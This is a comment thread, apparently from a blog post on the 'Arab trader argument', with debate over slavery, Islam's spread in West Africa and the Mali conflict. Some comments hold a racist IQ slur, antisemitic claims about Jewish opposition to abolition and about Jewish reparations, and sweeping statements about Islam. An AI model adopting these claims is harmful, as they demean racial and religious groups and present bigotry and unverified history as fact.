Black Americans dont automaticly love and accept and know about jazz…..you think black Americans are saying “he digs jazz , he must be cool…” Jazz is black American culture, it doesnt represent black Americans, it doesnt oblligate black Americans to embrace and play jazz on their sound systems…in fact most dont….but it is one of the highest expresions of black American culture and is part of black American history and Afro diasporic culture…its is there for any black American to discover if they want to and receive the treasures it represents , and the enormous pride they deserve to feel as it is one of black Americas highest expresions and gifts to the world
Oh, because I dated many many black woman and married two, Im thinking I get a pass on here? I thought you were reading this blog?
Havent you seen how integrated couples have been raked over the coals here? Havent you been paying attention? There is no badge of acceptance to come in here and say “im a white guy dating and married to black women….arnt I cool and accepted?”
The truth is , I am who I am, with my experiances, that nobody can take away from me, and, I am proud to stand up for my experiances and be exactly who I am…If I anounce on here I am from an integrated mairadge raising a bi racial son, its to stand up to anyone who would say that there is something funny about it.If I stand up for Afro diasporic culture and can bring insights to the table, especialy to show its great value and genius, its because it is a fact I have been a involved with these cultures ( I always was into jazz, African, Brazilian and Cuban drum/dance cultures) since before 8 years old, and, my passion , that is and always was my life and porfesion , has given me incredible insights into the value of the Afro diasporic culture..
Fankly, I find your acuasations extremly weak…even the semantical mixup of “islamist” . my gosh,you are using that as your basis to incriminate me?
Im calling you out for dropping a turd on this thread , by bringing in Sayyid and implying that his followers were somehow tied into a philisophical bond against white racism in America, Im telling you that , in light of his blatent racist statement, your assumtion stinks
on Sat Jan 12th 2013 at 21:46:01 Linda
“BR@
Linda, just look at Qubt’s remark. Its not even that he doesnt like jazz. “Bestial”? “primitive inclinations”? You may have to think in your head if it is religious or what, I dont, its plain as day exactly where he is coming from”
BR, in my own way, I was attempting to forestall the upcoming falling out between you and Bulanik…but Oh well, I knew it wouldn’t really work 🙂
So, I will carry on.
I already stated that I believe the north Africans are prejudiced/racist against the black Africans or darker skin. They seem to share the same colourism (reverse “US one drop rule”) as/was in the Caribbean/ Mexico/ Central/ South America. Living in Brazil, you know the score:
There seems to be this common thread where light-skin is preferred, where “white daddy” was beloved and “black mama” was kept in the closet and the “brown” children were tolerated by white society– educated to be “psuedo white people” loving everything European, given certain privileges and power, and taught to hate/despise/forget/deny their black African heritage. (whereas, in the US, these brown children were completely locked out of white society by the “one drop rule”)
But in the Caribbean / Latin America — these prejudices/racism was introduced courtesy of the Europeans; whereas, the North Africans seemed to already marginalize their black/ dark skin neighbors.
— my question is — was this racial attitude introduced by the first Islamic Arab Jihad wave into Africa as Barchan mentioned or was it introduced by the Europeans during occupation/ colonization?
Because no doubt, in western countries, Arabs and North Africans (like the Egyptians) are not considered “black” nor or they considered “white” — they are “other” and face similar racial marginalization just like black people do in Europe and America.
That being said, the existing racial prejudice the north Africans have, coupled with extreme Islamic beliefs, does seem to be a combination that belittles and seeks to destroy/dismantle whatever black African country/ culture they occupy…look at what’s happening in Mali –it breaks my heart.
The Tuaregs (north African berbers) sought to take back their ancestral lands from the “black African” oppressors and thanks to US interference in Libya, the Tuaregs got the opportunity and the firepower.
Quaddafi was a bad man indeed but he managed to stand between old adversaries, keep a certain order and sought alliances with his black African neighbors. The Tuaregs brought in their Arab / Islamic jihadist partners to enter into a fight they had no business being a part of and as usual — the Tuaregs got double-crossed because the Islamists promptly turned around and stabbed them in the back and kicked out the Tuaregs.
The Islamic jihadist took over Timbuktu and proceeded to destroy ancient African temples and artifacts out of contempt and intolerance (and big time Ignorance).
I understand the racial undertone that possibly drove the Tuaregs but the new Islamic jihadi fighters are Arabs from Middle East and Muslims from Pakistan/Afganistan so, would you say their contempt for African tombs/ history/ culture is racial or religious? because they seem to have no tolerance for any culture/ country they are in — look at what is happening in Nigeria and Pakistan.
Here’s a link if you are not familiar with what is happening in Mali?
http://www.guardian.co.uk/world/2012/oct/24/mali-africa
on Sun Jan 13th 2013 at 01:02:16 sam
Seems to me that everybody takes their shot at the tuaregs, from colonial times up today, from the french foreign legion to the foreign legion of islamists.
on Sun Jan 13th 2013 at 05:25:28 Linda
The Tuareg seem to have been marginalized by different groups over the years. Do you think they could be construed as oppressed as a result of this?
What do you think their entitlement should be in West African countries? I wonder whether we should even call it an entitlement since they are neither Arab or “black Africans”
As far as entitlements go, the Tuaregs are indigineous (originate) from west/ north Africa, so I feel they are entitled to fight and try to win back their ancestral lands and form a bordered country (something their forefathers fighting the French didn’t want to do)
Other ethnic groups in Africa have been fighting to re-establish their ancestral borders since the Europeans screwed them up — so the Tuaregs should try as well. My understanding is that they got screwed over by their Arab and black African neighbors during the fight for Independence from European colonialism
The Tuaregs are definitely marginalized as a group…it was done deliberately to weaken them — first by the French, then by the North and West Africa post-colonial countries (ex. Algeria, Niger).
I don’t really know the history very well but from what I’ve read, the Tuaregs seem to have the same problem as the indigineous natives of North/South America and Australia — they are treated as second-class citizens in their own ancestral lands ….as a people, they were not taken into consideration when these new “republics” were being formed.
Now, on the flipside, should I, feel sorry for them? (u know I like to play devils advocate 🙂
From what I’ve read, the Tuaregs controlled the Saharan Trade Routes pre-European invasion (colonialism) – they were responsible for bringing black African slaves north — so they had a huge hand in controlling the flow of slaves in Africa.
In a way, it could be said that “payback is a b’tch” because they’ve been fighting to regain their indepenance since 1962 in Mali and Niger.
Do the Tuaregs have a rightful claim?
My understanding is that the Tuaregs claim to be the descendents of the Songhay and have ancestral rights to re-establish the borders of the Songhai empire (I believe this is the “Azawad” they keep referring to) which the Songhai ruled after the Mali empire declined.
but PLEASE, Bulanik — anyone familiar with the history — correct my information or fill in the holes because I don’t know enough about this history — I shouldn’t even be commenting on it but I find this part of African history to be interesting — and to me, the Tuaregs are an interesting, complex people
But isn’t the vandalism targeting Muslim saints’ tombs? Aren’t they pulverizing valuable parts of the history of Islam in Africa?
(Also, if Islam was brought to Mali through aggression, then why would such mausoleums, etc., even exist?)”
I guess my point was that the Islamic jihadist have no respect for any culture – muslim or non-muslim…
As far as Timbuktu goes, from what I’ve read, it was the Tuaregs around 1000 AD (Tin Abutut, Maghsharan Tuaregs) who established it — pre-Arab invasion (please correct me if I’m wrong) — so this city is firmly African. I was incorrect by saying the Tuaregs are descendents of the Songhai — the Songhai are a seperate group that ruled Timbuktu after the Tuaregs.
It seems it was the Tuaregs, then Mali empire, then Songhai empire, then Dende empire, various groups, then the French, to present day Mali, with the Mande being the majority population.
But as for Timubktu being ransacked, they are destroying both black African and Arab/muslim history.
In the 11th century:
“The first constructions in Timbuktu were designed by African architects from Djenne (Soninké) and later on by Muslim architects from North Africa. Trade and knowledge were at their height. It was at this time that the King of Sosso invaded the empire of Ghana, thus causing the exodus of the scholars of Walata to Timbuktu.”
http://www.timbuktufoundation.org/history.html
So, if I understand, the Temples/ artifacts are a mixture of black African and Arab/Muslim architecture. I don’t think all the credit should go to the Arab muslims — I would be very interested to know who taught/copied who —
what I find to also be a travesty is that many old manuscipts are still being held in French museums.
on Sun Jan 13th 2013 at 07:11:24 Ghost
@ King.
“Does the fact that the other two guys beat the rap make the white guy any less guilty of assault?”
Course not. But that also means that the other 2 shouldn’t be let off, we shouldn’t call off the hunt, or we shouldn’t be pissed that the arab used his connections to get away with a crime.
But, Linda, since you mention it, and you also mention Mali, I would appreciate if you’d outline the origins of Islam in west Africa and please specify the methods used.”
Now you know this is your specialty here…I’ve already exhausted myself just learning about the Tuaregs 🙂
but based on my readings, I believed it spread further west during the Mali empire (founded by ruling families of the declined Ghanian empire) and also during Songhai dynasty.
The Soninke (black Africans), the founders of the ancient Ghanian Empire (750-1240 CE) embraced Islam in the 1000’s after coming into contact with the Almoravids (Moroccan Berbers). The Moroccan Berbers converted to Islam in the 9th century (after contact with the Arabs) and became known as the Almoravids who invaded/converted the Sudanese in 10th century and also invaded Spain — known as the Moors.
After the decline of the Ghanian empire, some of it’s former rulers (keep in mind they were mostly black Africans) formed the Mali empire (most famous ruler was Mansa Musa, who built the University of Sankore in Timbuktu and famous temples). I believe the religion was spread even more west & east during the rule of the Songhai empire (by Askya Muhhamd I aka “Askia the Great” (from Solinke/Songhai ruling families)
http://www.whenweruled.com/articles.php?lng=en&pg=22
Side note: There was alot of intermixing during this time – many of the Almoravids married into prominent Ghanian ruling families — this is primarily how the religion was spread during the Ghanian empires occupation by the Almoravids, as well as people converting becausing they were being over-taxed because they were non-muslims.
and vice-a-versa–many of the Ghanian people assimilated into the Almoravids – so “slavery” is not the only reason why north Africans carry black African genes.
Here is an interesting map I found that compares empires
http://empires.findthedata.org/compare/140-147-165-188/Ghana-Empire-vs-Kingdom-of-Kush-Mero-vs-Mali-Empire-vs-Songhai-Empire
I find this stuff so fascinatings — Africans have all the rights in the world to hold their heads up high and give the middle finger to the white Europeans whose ancestors were still primitive barbarians when these black African people were building empires.
you mentioned “methods” of contact – I forgot to really address this…
The Almoravids got into Ghana by mostly invasion/ war but they also married into the ruling classes — my readings indicates that this is how the religion was primarily spread. The Almoravids invaded the Ghana Empire because it was one the richest empires at the time and the wanted a piece.
on Tue Jan 15th 2013 at 17:16:18 Linda
You mention above that in Ghana the religion was spread by war and invasion mainly.”
No, that’s not what I meant. From my readings, in Ghana Empire, the religion was spread mainly through Marriage.
“Linda@ The Almoravids got into Ghana by mostly invasion/ war but they also married into the ruling classes — my readings indicates that this is how the religion was primarily spread.”
The Almoravids spent almost 10 years fighting to get in/take over Ghana empire through invasions because it was one of the richest regions at the time. If anything, they were more successful destabilizing Ghana from the inside — marrying into the rulng families, converting the ruling families to Islam, gaining power, having new laws enacted in accordance with Islam.
Once they were able to get in successfully with their army, their main goal was to rule the Empire — this goal was financially motivated. Spreading their religion was secondary.
I also read that many of the regular people –trademen, merchants, etc.. converted to Islam because the were being over-taxed because they were not muslims. The Soninke ruling class had already converted to Islam (and so did their servents) but the religion didn’t “spread” because of this…it seemed when they moved on to form Mali dynasty that the religion took on more traction.
on Thu Jan 31st 2013 at 22:23:36 sam
I think just like in christianity there has been several different stages in islam. In its heyday during the islamic renessance muslim world was the most advanced. They had 1000 doctors working in a hospital in Bagdad which was free for all. They had post offices as far as in China, knew the basics of photography, were top class in mathematics, biology, geography etc. BUT the religion moved in to the center and that was that.
Same happened in the Ottoman empire. As soon as the religion began to difine and direct the development of society, unavoidable stagnation arrived. Same happened in the west with christianity, first during late 300’s and then during the middle ages etc.
If anyone has any illusions or missguided ideas about the nature of islam, just read the Koran. It is very clear on certain issues, such as how women are always under the will of men, without any exception, and how the infidel must be eliminated one way or the other. Just like christianity islam is a religion which has a basic consept of submission, surrender of ones own will to the God will, which is naturally explained by those who “know better”. Both are very political and also systems of power and control. That is the key for islam and christianity.
Islam was very militant and was spread into Africa by missionaires and military, just like christianity was spread into Europe before. The conversion was sometimes peaceful but usually forced. This meant destruction of local belief systems, killing off the local holy men and women as witches, destroying the native temples or holy places, images etc. Just like in the case of christianity. Similar tales of massacres, conquest etc.
I know it is fashionable today to see islam in a politically correct light and explain its history in a cleaned up way but the conquest of north Africa was just that: a conquest. It was not a huge wave of spontanic conversion or native movement, it was a conquest of the eastern arabic origin and the guide line was the command of Koran: the holy war to make the world muslim. The same kind of idea and ethos was behind the european crusades bit later: holy war and conquest, “saving” the world.
I think this is a neat package of the arab conquest and it has source references too.
http://patachu.com/maghrib-arab-conquest-of-650-715/
Naturally I assumed that people know how the christianity was brought to Europe, by conquest and holy war. Charlemagne for example killed tens of thousands of western slavs and germans with his crusades and those wars continued all to way up to the surrender of Lithuania in late 1300’s to the church. So it took some 400 years and hundreds of thousands of dead europeans before Europe was even nominally christian.
So perhaps I should clarify my stand on these religions. I see them pretty much the same. From my perspective there is no difference between them and also, they have the same God, so…
What I meant with the political correctness is that when we now live the time when islamophobia is running rampant in the west, and is used by many opportunistic politicians and extremist right wing nutters, there is a tendency on the other end of the spectrum try to see islam in more postive light than what it is. This is what I meant. And like this conversation here shows, it is very hard to discuss about islam without misunderstandings.
As for the conquest of Spain by the moors, it would be good to remember that the situation was never as clear cut as we today often think it was. El Cid, that great spanish national hero, for example, was on the pay roll of some muslim lords at one time or another, and he fought against the muslims and sometimes against the christians. So muslim conquest and the reconquista later were not black and white events, they were very confused, mixed, and very complex series of events spanning for centuries.
on Sat Feb 2nd 2013 at 04:28:37 oogenhand
http://www.dailymail.co.uk/news/article-2271921/Victorias-Secret-worker-scarred-life-niqab-wearing-attacker-threw-acid-face-walked-home-shop.html
on Sat Feb 2nd 2013 at 09:43:55 Linda
Bulanik, I will try to clarify my points (I don’t have much time now but I want to continue this discussion)
I have nothing against Islam in itself– only how it is practiced or rather manipulated in certain countries or groups with Agendas — this could be said of almost any religion. I also have a beef with different Christian groups and their version and interpretation of the “word”…but I digress
It’s not yet clear to me what your PoV is on the subject under discussion.
The impression I have so far is that you believe Islam, over the centuries, was enforced and imposed by violence on unwilling Africans by paler invaders.
If I have got you wrong, excuse me in advance, and put me right”
Your impression is Not at all my POV– to be clear:
the Africans themselves helped to spread Islam and the spreading and teaching of the religion was done non-violently. it was the Berbers that kicked it off and spread it south and groups like the Sudanese helped to spread Islam west and South.
The religion first hit African shores in the northeast, brought by the Arabs/Eurasians, who initially came peacefully and established relationships with the local people — but then, as you know, a military invasion came after the death of the prophet Mohammed — this is the violence that most people speak of when talking about Arab invasion into north Africa (I’ve never heard of armies taking territory without bloodshed.)
I was trying to say that in the north West, the conversion to Islam on a larger scale began with the Almoravids, and gained more traction by spreading into the Ghanian empire.
This conversion was done peacefully because the majority of Ghanians themselves learned about Islam, accepted and converted willing — and when the Ghanian empire declined, the Ghanian people themselves spread Islam even further west, south, and east (Malian Empire, Songhay Empire)
But the conquest of the Ghanian region (geography-wise) was done through force- the Almoravids took control using violence — The Ghanian rulers were not willing partners in giving up their trade-routes and wealth.
Keep in mind that the Almoravids were Berbers, who were called “Warrior Monks” — they were well known and respected as tough military fighters and for being very religious, very pious and devout — their primary goal was to spread the teaching of Islam and they ruled/ took control of different regions/ countries by any means necessary– this is what they were known for — their military and fighting skills. (That’s why the Arabs in Spain reached out to them for help against the Christians)
Also, the Almoravid army (and Empire) had to maintain itelf, so their secondary objectives was financial — they had to have funding.
“Before the advent of the Almoravids in the first half of the eleventh century, the Sanhaja (Almoravids) had only played an ancillary role in the trade links between southern Morocco and Ghana and the western Sudan. They had been passive witnesses of the intense commercial exchanges taking place through their territory without gaining any profit from them. Control of the trade routes was in the hands of the Soninke state in Ghana, in the south, and of Zanata Berbers—a rival tribal group—in the north. The first Almoravid campaigns were aimed, therefore, at occupying the main commercial centers.”
http://patachu.com/abd-allah-ibn-yasin-almoravid-sahara/
So yes, the Almoravids wanted to rule the commercial routes that the Ghanians controlled — that’s why they invaded the Ghanian Empire–dinars were made from Gold that was brought from the south by the Ghanian traders.
Even though the Almoravids were considered to be “religious zealots” — they were also known for being tolerant of other religions (unlike the Almohads) and for not forcing the local populations to convert to Islam but the local populations had to follow their rules, which were based on islamic doctrine.
on Sun Mar 24th 2013 at 21:12:59 Neeva
This blog is nonsense.There are no arab trader arguments or white invention arguments.This is pure fabrication by abagond.But,i suppose it serves the interests of anti-racists(the most intolerant and biggoted people alive)Regarding this thread.It certainly is important to mention the arabs,and more importantly,the jews involvement in the african slave trade.This does not mean whites are refusing to take responsibility,they are just pointing out that other ethnic groups share the responsibility.Everyone also seems to forget that blacks themselves enslaved their own people and sold them to traders.This is not shifting blame,it is a fact! Another fact which is also conveniently omitted is that whites worked to end the slave trade,despite jewish opposition.Again,this is not,as this blog would have us believe,because whites were trying to redeem themselves by doing something “good”,they did it because they truly believed it was wrong.In other words,whites are the not singular cause of all the “evil”(an exaggeration)or “oppression” of the world,although there are obviously many who want to believe this for whatever reason.
on Mon Mar 25th 2013 at 00:55:42 Sharina
@ neeva
But it also seems to serve the interest of you because you post here alot.
on Mon Mar 25th 2013 at 01:16:27 jefe
Everyone also seems to forget that blacks themselves enslaved their own people and sold them to traders.This is not shifting blame,it is a fact!
Abagond had a term for the practice of how a counter-argument actually validates the original premise. What was it called? The Roisey effect (or something like that)?
on Mon Mar 25th 2013 at 15:54:06 oogenhand
Again, we should pressurize Arabs and Jews to pay their share of reparations. Next to morality, there is common sense. It would be very stupid to only attack the people who more or less voluntariliy gave up slavery. Nobody would be so stupid to ever free his own slaves, if no good deed goes unpunished.
Also, Sandew Hira has interesting comparisons with the Jewish Holocaust.
This blog is nonsense.
Why are you here? to provide some comic relief?
Neeva is just filled with broken record arguments, among other things.
on Tue Mar 26th 2013 at 04:44:41 oogenhand
I WILL make sure Arabs will pay Allen West, I WILL make sure Jews will pay Tony Martin. Arabs and Jews are threatened by Iranians in the Middle-East, and they are busy destroying each other.
As well, both cultures are more tolerant of abortion than of euthanasia, which will make their demography lopsided towards old. Israel has the additional problem of Ultra-Orthodox people who only study Talmud, and have large families.
on Wed Apr 3rd 2013 at 16:29:41 waltika
Reblogged this on waltika.
on Wed Jul 10th 2013 at 11:00:02 EuroGAL
According to the race research done in the early 1900s, Arabs are Caucasian. Doesn’t that make them white in a sense?
on Thu Aug 1st 2013 at 12:05:10 White Supremacist
I’ve been reading your posts and have come to the conclusion that you’re probably in the 60-75 IQ range (not uncommon among your kind).
You do understand that you can’t condemn Europeans as uniquely evil if they did what anyone else did/would do in that age? Lunatic.
[…] The Arab trader Argument […]
on Fri Oct 4th 2013 at 06:38:22 The Arab trader argument | White's Only | Scoop.it
[…] The Arab trader argument is my name for an argument white Americans often use to defend the evil they do in the world. It goes like this: if white Americans do something evil and terrible it is all… […]
on Tue Oct 8th 2013 at 13:58:46 Samantha Tesner
Reblogged this on Setting the Record STR8.
on Tue Oct 22nd 2013 at 07:31:56 The Arab trader argument | Culturally Teaching ...
on Tue Oct 22nd 2013 at 10:58:30 The Arab trader argument | THE REUNION OF BLACK...
on Wed Apr 23rd 2014 at 14:17:47 Herneith
When fools try that argument on me, I just tell them I am not from the country they are alluding to so why bring that up? I also tell them to stay on topic. The anger and frustration they exhibit is hilarious.
on Wed Apr 23rd 2014 at 19:13:17 Sharina
I gather that seems to be more your iq level if not lower. Seeing as your ability to comprehend seems to be shot all to hell.
on Fri Apr 25th 2014 at 18:45:06 KungPao
Mentioning Arab slave traders is not meant to excuse morally wrong actions, it’s meant to keep people intellectually honest who focus exclusively on white sins and act as if non-whites have a moral high ground, completely peaceful peoples who just happened to have their happy times interrupted by evil white racists.
If equality is your bag, then dole out the judgements equally.
on Fri Apr 25th 2014 at 19:34:09 Herneith
@Kung Pao:
Hilarious, another colour-blind racist!
on Fri Apr 25th 2014 at 19:36:45 Sharina
KungPao
If you call intellectual honesty deflecting from the subject at hand. If a person wants to truly show some level of intellectual honesty then they will simply acknowledge the wrongs of said individuals and move on. Not try to push the focus elsewhere. It is simply an argument among 2 year olds. “But he did it first…blah…”
on Sat Apr 26th 2014 at 03:15:31 KungPao
Intellectual dishonesty is when you keep on harping on slavery when any reasonable white person will say “Yes it’s bad and was horrible, what more do you want?” And then keep on harping them and NEVER confront other peoples with legacies of slavery nor mind the modern slavery that happens today in Sub-Saharan Africa.
The reason the Arab slave trade is even brought up is because this happens so often in debate. Those who bring it up are not looking to excuse white slavery of blacks, they’re seeing if you’re just as principled against other slave trades as you are against white slavery.
And you never are.
You need a bib or something?
on Sat Apr 26th 2014 at 03:26:36 King
,blockquote>Intellectual dishonesty is when you keep on harping on slavery when any reasonable white person will say “Yes it’s bad and was horrible, what more do you want?” And then keep on harping them and NEVER confront other peoples with legacies of slavery nor mind the modern slavery that happens today in Sub-Saharan Africa.”
Or in other words, you haven’t ever taken the time to look at all the past posts on this blog that address just that.
on Sat Apr 26th 2014 at 05:30:14 Sharina
“Intellectual dishonesty is when you keep on harping on slavery when any reasonable white person will say “Yes it’s bad and was horrible, what more do you want?”—On the contrary, intellectual dishonest is the advocacy of a position known to be false, but that is not the case here (though other definitions may apply). The whole point of the post is for people who do not say “Yes it’s bad and was horrible, what more do you want?” but choose to use this to deflect from the point at hand. They never make it to “Yes it’s bad and was horrible, what more do you want?”
“And then keep on harping them and NEVER confront other peoples with legacies of slavery nor mind the modern slavery that happens today in Sub-Saharan Africa.”—Who says they don’t?
“The reason the Arab slave trade is even brought up is because this happens so often in debate. Those who bring it up are not looking to excuse white slavery of blacks, they’re seeing if you’re just as principled against other slave trades as you are against white slavery.”—And what proof do you have that this is the reason? You are now taking on the position of assuming you know what every person that uses that argument means. Reasonably you don’t, but for argument sake lets say you do. So they use this argument, but it is still deflection. They still are trying to point fingers at another instead of owning up to said wrong.
This does not mean that the others involved should be overlooked, but it does mean that it is a weak argument to try and make it acceptable by saying such and such did it first. Like I said…it is a child’s argument regardless of what party uses it.
“And you never are”—I never am what? If you are assuming something about me then you are aware that you have thus far engaged in intellectual dishonesty? I am confused on how you hope to lecture people on something you can not manage to not engage in yourself?
on Sat Apr 26th 2014 at 06:43:43 jefe
Seems like we have another white male Asiaphile loose in the house. Soon we will be hearing the Asia atrocity arguments again to be “balanced”. That is the corollary to the Arab Trader argument.
Don’t tell me it is a reincarnation of DJ or Asplund or XPrae.
“I never am what?”- People like you are never as sanctimonious with other forms of slavery as you are with white slavery. I don’t know that for a fact with you, but I’d wager from the general tenor here that is the case given all the ‘white male this’ and ‘racism that’ going on.
“Who says they don’t?”- I say they don’t. Most slavery discussions are centered around white-black slavery, other forms are derided as ‘making excuses’.
“And what proof do you have that this is the reason?”- Some I’m sure really are making excuses for slavery, but for the people who make it past that, who say “Black slavery is bad and gone.”, the Arab Trader has its appeal to make those observing the debate aware that slavery has gone on long before and after the white man elected to stop it in his own countries, as these debates are often framed in terms of “LOOK WHAT WHITES DID!”.
After one debater has ceded that black slavery is bad, there’s no point in beating the horse further unless there’s some other motive at play other than the spirit of debate.
on Sat Apr 26th 2014 at 11:22:43 B. R.
For me, the “Arab trader “argument has lost its value on here…
The cut and dried truth is, it is suposed to be used on whites who will try to diminish the Atlantic slave trade by stating that it happened from the Arabs
To be sure, in the light of this dim wit cowboy and Fox news ridiculous followers, it is a valid point
but, i went out of my way to say the Atlantic slave trade was worse for the slave taken to the Americas, and more brutal for the individual…but, what happened to black non Christian and non Islamic Africa , was equaly as brutal…the amount of slaves dying on the jornies to the slave ships was equaly brutal, the ripping apart of families was equaly as brutal, those slaves didnt go home for family visits
Huge amount of comments on here refer to the absolute humiliation and cruelty of white rapes of black slaves in America, it is one of the leading themes, yet , black African women in the Arab slave trade , in many cases, or the majority of cases , were actualy brought over to be exactly sex slaves…and in some cases, the mens genitals cut off to guard these women
People talk about the Arab slave could be freed in twenty years…what was the life span of people back then? How many people could survive twenty years of slavery? Were those words just wishful thinkingn from the Koran, but not played out on the ground like the Declaration of Independance?
I totaly get the point white people should be shut down if they try to diminish the Atlantic slave trade, but, it is really wrong to try to not address the reality of the Arab slave trade in black Africa, that lasted a thousand years and had its peak in the late 17 hundreds and mid 18 hundreds
and how both the Arab slave trade and Atlantic slave trade have been equaly guilty of destroying Afro diasporic culture…
bottom line, if people can say the Atlantic slave trade was worse, the true ramifications and huge scope of the Arab slave trade and what it did to black non Islamic Africa should be fully on the table
if people can say the Atlantic slave trade was worse,
on Sat Apr 26th 2014 at 15:05:34 Herneith
Hi Asplund, or is it Da Jokah? Another racist moniker I see. Kung Pao, is there some underlying meaning to this or do you just like the chicken. Carry on Aspy!
Why do people always confuse the Arab Slave Trading Argument:
“You cannot reduce culpability by pointing at another group of people who have things that are just as bad as you have.”
with the ‘Black Slavery Was Worse’ argument?
Do they need a bib?
on Sat Apr 26th 2014 at 15:57:55 abagond
@ KungPao
1. In my experience the Arab Trader argument is brought up as a deflection, not as a serious point in the spirit of debate. MOST people who bring it up are not serious students of history. Nor are they the sort who can admit that whites are a mix of good and evil like everyone else.
2. This blog mainly concerns racism in the US. That is where I and most commenters live. It is not a world history of Man’s Inhumanity to Man. So the slavery practised by White Americans is what matters most.
on Sat Apr 26th 2014 at 16:10:09 Matari
Abagond – or anyone else,
Please share your awareness with us, if you know…
Are you aware of any slaves that were involuntarily brought to the American mainland, yet were freed, or manage to escape and return to the EXACT same people, group, village or place that they were taken from on the African continent??
I will respond to you thoroughly, but first I wanted to ask; why harp about intellectual dishonesty and then turn around and engage in it? If you are unaware of what it means and signs of it then I ask you to research it but I think it was just a waste of time to lecture someone on it and then use it. In the mean time I will point out where you have engaged in it and perhaps in your response to me you can answer with intellectual honesty.
“People like you are never as sanctimonious with other forms of slavery as you are with white slavery.”—And who or what are people like me? I never divulged any information about who I am so it really is odd that any reasonable individual of adult stature would rely on assumptions in an argument/debate. You lose credibility here, but you also engage in that intellectual dishonesty you kept talking about as you are relying on an assumption to make your case.
“I don’t know that for a fact with you, but I’d wager from the general tenor here that is the case given all the ‘white male this’ and ‘racism that’ going on.”—You don’t know that at all wager or no. You can not pin point what a person thinks or believe based on what others in here say. This is another form of intellectual dishonesty. You are basically attempting to dismiss my credibility based on what you have determined I might believe based on others.
“I say they don’t. Most slavery discussions are centered around white-black slavery, other forms are derided as ‘making excuses’.”—-And what authority do you have? Do you read minds or are you some psychic in your spare time? I say most don’t, so why is it that you view me as less credible when you endorse a “say so” as credibility? This is also a form of intellectual dishonesty in that you are making yourself the authority of something. Most discussions on slavery would be about white-black if that was the topic to begin with (transatlantic). Bringing in what other people did is deflection and it does not address the issues being made. If a person lived in another country then of course the issue would not be white-black as they were likely not affected by transatlantic in the sense of white-black. For example if the actual topic was arab slavery, then it would be ridiculous for my only retort to be whites in the Americas did it or everyone does it.
“Some I’m sure really are making excuses for slavery, but for the people who make it past that, who say “Black slavery is bad and gone.”—I would say very few make it to “Black slavery is bad and gone.” So few that this is the reason this post was created.
“the Arab Trader has its appeal to make those observing the debate aware that slavery has gone on long before and after the white man elected to stop it in his own countries, as these debates are often framed in terms of “LOOK WHAT WHITES DID!”.”— I am confused because you have listed a few different reasons why it is used so which one is it? Everyone knows that the transatlantic was not the beginning, so it would not make sense to use the Arab trader argument in a debate for that reason.
Man 1: Slavery in the Americas was terrible etc.
Man 2: Quit complaining because Arabs sold slaves too and it was worse.
If said individual was tracing back the history to show where it began then by all means I would accept that as valid when discussion the issues of slavery in the Americas, but just to bring it up because they don’t like people talking about white-black slavery is a bit ridiculous and is nothing more than deflection.
No one is claiming that Arab slavery was somehow better or a day in the park. This blog does not hide the fact that Arabs had black female sex slaves or that they castrated black boys or that slavery by Arabs probably still goes on:
https://abagond.wordpress.com/2013/01/23/arab-slavery/
“it is really wrong to try to not address the reality of the Arab slave trade in black Africa, that lasted a thousand years and had its peak in the late 17 hundreds and mid 18 hundreds”—I have absolutely no problem with addressing any type of slavery a person wishes, but I do have a problem about when people choose to bring it up and on Q it is always when American slavery or transatlantic slavery is mentioned.
Those same people do not care to or wish to discuss or address it any other time, so that leads me to believe that they are looking to deflect. Truth of the matter is that they each need to be discussed on their own merit because there is so much information to both, IMO.
“After one debater has ceded that black slavery is bad, there’s no point in beating the horse further unless there’s some other motive at play other than the spirit of debate”—Just because one person/debater admits to it being wrong does not mean every person agrees or believes that. What kind of faulty logic is this? Actually that is the debate stopper unless said individuals goes on to try to minimize or deflect. At which point he is opening the door for the debate to continue.
If I said drugs in the US are bad and should be made illegal, but Europe does drugs too and they are worse.
That statement then opens the door for someone to debate me on the matter of who has a worse drug problem. It is still the spirit of the debate, but one I opened to be further examined.
Yes, Abagond, and Sharina , what you are saying is what I had in mind…I would never diminish the Atlantic slave trade using the Arab slave trade , or want to change the subject to the Arab slave trade , when talking of the horrors of the Atlantic slave trade
But, I did get carded about that by you, Abagond…when I thought I mentioned up front I thought the Atlantic slave trade was worse (meaning you seemed to agree with someone about it used on me)
I could be wrong in my judgement, but I sure dont have a problem directly facing the history of slavery in the USA and also saying I know the legacy of slavery exists into today…like a festering wound
I would think white people would want to address that just to make society a better place without those kinds of festering wounds…we all would be better off if we did…but, you got so many examples of Fox nuts and guys like that cowboy..when i see that, I surly understand the need to shut that down
Fair enough. Thanks for the civil response.
“Why harp about intellectual dishonesty and then turn around and engage in it?”- When I first jumped in, I was talking about the dishonest people who are most vociferous in their condemnation of white slave trade and give at most a slap on the wrist for everyone else. Kind of like how many atheists lump in Taoism and Wicca into their anti-religion rants even though they don’t give a shit about them, they just don’t want to be seen as partial and biased when they kick in Christianity’s teeth.
“And who or what are people like me?”- Don’t play coy. Birds of feather flock together. The people who go HYUCK HYUCK WHITE COWBOY! FAUX NEWS! Will be the same ones who overlook non-white atrocities in favor of emotionally appealing white ones.
“You can not pin point what a person thinks or believe based on what others in here say.”- It’s generally a good bet, see above response with people of generally the same mindsets congregating.
“And what authority do you have? Do you read minds or are you some psychic in your spare time?”- No but I do have eyes and I’ve observed most slavery talk centers around one kind that happened in the past. Your experiences may be different.
“I am confused because you have listed a few different reasons why it is used so which one is it?”- Why not both? The purpose of bringing it up in one context (online thread) is to see if one’s opponent is true to the principles of their anti-slavery rhetoric or will rationalize other trades away due to their white biases, the purpose of bringing it up in another context (real life) is for the benefit of any observers present.
“Everyone knows that the transatlantic was not the beginning, so it would not make sense to use the Arab trader argument in a debate for that reason.” – Not everyone knows that. I’d be surprised if the American school system even mentioned slavery in Egypt. For those that don’t know, the Arab Trader is useful for dispelling the mythical quality of the white tyrant, and while not excusing his crimes, it shows others not like him were just as fallible and prone to cruelty
“Just because one person/debater admits to it being wrong does not mean every person agrees or believes that.” – I never said as much, only that once that one person says “I agree, black slavery was bad.” then there’s no point in going “Well! Don’t you feel baaad about it!? Guilty?” to that one person. This holier-than-thou moral posturing is disingenuous when other legacies of cruelty are passed over. White people do this the most and it becomes a competition on who can feel the most bad about something, who has experienced the most privilege, like a post-modern confession, such as the We Are Not Trayvon Martin tumblr where a bunch of narcissists ego stroke each other over how not racist they are.
“Actually that is the debate stopper unless said individuals goes on to try to minimize or deflect.”- If the debate was “Was black slavery bad?” then yes it would. Most debates tend to have broader topics however.
Agreed @ B.R.
on Sat Apr 26th 2014 at 21:06:55 Bic Bickel
